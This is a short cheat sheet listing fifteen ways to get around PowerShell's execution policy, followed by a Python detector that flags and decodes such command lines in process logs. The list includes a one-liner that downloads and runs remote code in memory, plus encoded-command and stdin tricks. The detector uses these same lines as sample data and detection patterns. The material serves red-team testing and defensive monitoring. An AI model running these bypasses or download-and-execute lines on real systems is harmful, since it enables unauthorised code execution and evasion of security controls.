Bypass the PowerShell Execution Policy
💻 15 Ways to Bypass PowerShell Execution Policy
Based on the original by Scott Sutherland (NetSPI)
PowerShell’s execution policy restricts script execution, but these methods allow you to bypass it without needing admin rights.
🧪 Quick Methods with Examples
- Paste directly in the console
  Policies don’t apply to manually typed commands.
- Echo & pipe to PowerShell
  echo Write-Host "Hi" | powershell -noprofile -
  Executes via stdin.
- Pipe a script file
  Get-Content script.ps1 | powershell -noprofile -
  Reads line-by-line as input.
- Download and execute in memory
  powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL')"
  No file written to disk.
- -Command argument
  powershell -command "Write-Host 'Bypass'"
  Executes inline commands.
- -EncodedCommand argument
  Base64-encoded string passed directly to PowerShell.
- Set execution policy in session
  Set-ExecutionPolicy Bypass -Scope Process
  Only affects current session.
- Use PowerShell ISE
  powershell_ise.exe script.ps1
  Sometimes bypasses policy.
- Rename script to .txt
  Read and run manually; avoids .ps1 enforcement.
- WMI execution
  Runs PowerShell remotely via Win32_Process.
- Scheduled task
  Create task to run your script.
- PowerShell remoting
  Executes on remote systems; local policy may not apply.
- Inject via DLL (advanced)
  Loads PowerShell engine directly in memory.
- Invoke from MSHTA or wscript
  Uses alternate script hosts to trigger PowerShell.
- Use trusted software to execute
  Hijack or abuse applications that run PowerShell under the hood.
Note: These methods are for legitimate use only — such as automation, testing, and red teaming — where authorized.
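Several of the command-line forms listed above (stdin via a lone `-`, `-Command`, `-EncodedCommand`) are visible in process-creation logs. The following Python is an added example, not code from the original article: it labels logged powershell.exe command lines and recovers the text behind `-EncodedCommand`. The label names and sample lines are constructed, and the handling of abbreviated parameter names (`-enc`, `-c`) is this example's assumption about what a log may contain.

```python
import base64

def _abbrev(tok, full):
    """powershell.exe accepts a prefix of a parameter name (-enc, -c, ...)."""
    name = tok[1:].lower()
    return tok[:1] in ("-", "/") and name != "" and full.startswith(name)

def decode_encoded_command(b64):
    """-EncodedCommand carries Base64 of the UTF-16LE command text."""
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    except ValueError:          # malformed Base64 in the log line
        return ""

def classify(cmdline):
    """Return (labels, recovered command text) for one logged command line."""
    toks = cmdline.split()
    labels, text = [], ""
    for i, tok in enumerate(toks[1:], start=1):
        if tok == "-":          # lone dash: script text arrives on stdin
            labels.append("stdin")
        elif _abbrev(tok, "encodedcommand") or tok.lower() in ("-ec", "/ec"):
            labels.append("encoded-command")
            text = decode_encoded_command(toks[i + 1]) if i + 1 < len(toks) else ""
            break               # the rest of the line is payload, not flags
        elif _abbrev(tok, "command"):
            labels.append("inline-command")
            text = " ".join(toks[i + 1:]).strip('"')
            break
    low = text.lower()
    if "downloadstring" in low and ("iex" in low or "invoke-expression" in low):
        labels.append("download-and-execute")
    if "set-executionpolicy" in low and "process" in low:
        labels.append("process-scope-policy")
    return labels, text

# Constructed sample command lines, as they might appear in process-creation logs.
_B64 = base64.b64encode("Write-Host 'Bypass'".encode("utf-16-le")).decode()
SAMPLES = [
    "powershell -noprofile -",
    "powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('URL')\"",
    "powershell.exe -NoP -enc " + _B64,
    r"powershell.exe -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Techniques that never reach a powershell.exe command line (pasting into the console, the ISE, in-memory engine loading) are outside what this check can see.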